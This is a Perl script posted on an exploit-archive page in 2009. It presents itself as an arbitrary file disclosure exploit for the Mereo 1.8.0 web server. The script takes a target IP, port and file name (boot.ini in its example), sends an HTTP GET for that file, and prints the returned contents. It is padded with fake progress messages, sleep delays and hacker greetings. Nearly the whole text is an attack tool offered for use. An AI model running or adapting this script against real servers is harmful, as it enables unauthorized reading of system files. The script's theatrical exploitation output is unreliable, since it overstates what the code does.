Home / os / win10

mereo-disclose.txt

Posted on 11 May 2009

#!/usr/bin/perl -w # # Found By : Cyber-Zone (ABDELKHALEK) # Paradis_des_fous@hotmail.fr # # # Note : Don't use this for your own R!sk :d # # # Thanx To All Friends : Hussin X , Jiko , Stack , SimO-sofT , r1z , ZoRLu , Mag!c ompo , ThE g0bL!N , b0rizq , All MoroCCaN Hackers # # demo version Tested under my MS WINDOWS sp2 # # use LWP::Simple; use LWP::UserAgent; print " Mereo 1.8.0 Arbitrary File Disclosure Exploit "; print " **************************************************************** "; print " * Found And Exploited By : Cyber-Zone (ABDELKHALEK) * "; print " * E-mail : Paradis_des_fous[at]hotmail.fr * "; print " * Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM * "; print " * From : MoroccO Figuig/Oujda City * "; print " **************************************************************** "; if(@ARGV < 4) { &help; exit(); } sub help() { print "[X] Usage : perl $0 HackerName IP Port File "; print "[X] Exemple : perl $0 Cyber-Zone 127.0.0.1 80 boot.ini "; } ($HackerName, $TargetIP, $AttackedPort, $TargetFile) = @ARGV; print("Please Wait ! Connecting To The Server ...... "); sleep(5); print(" ****************************** "); print(" * Status * "); print(" ****************************** "); print("Loading ........................................ "); $temp="/"; my $boom = "http://" . $TargetIP . ":" . $AttackedPort . $temp . $TargetFile; print("Exploiting .....> |80 "); sleep(15); print("Exploiting ..........|Done! "); sleep(5); $Disclosure=get $boom; if($Disclosure){ print(" ............File Contents Are Just Below........... "); print("$Disclosure "); print(".........................EOF....................... "); print("Done For Fun //Figuigian HaCker "); print("Some Womens Makes The World Special , Just By Being On it <3 "); print("SEE U $HackerName "); } else { print(" Not Found !!! "); exit; }

 

TOP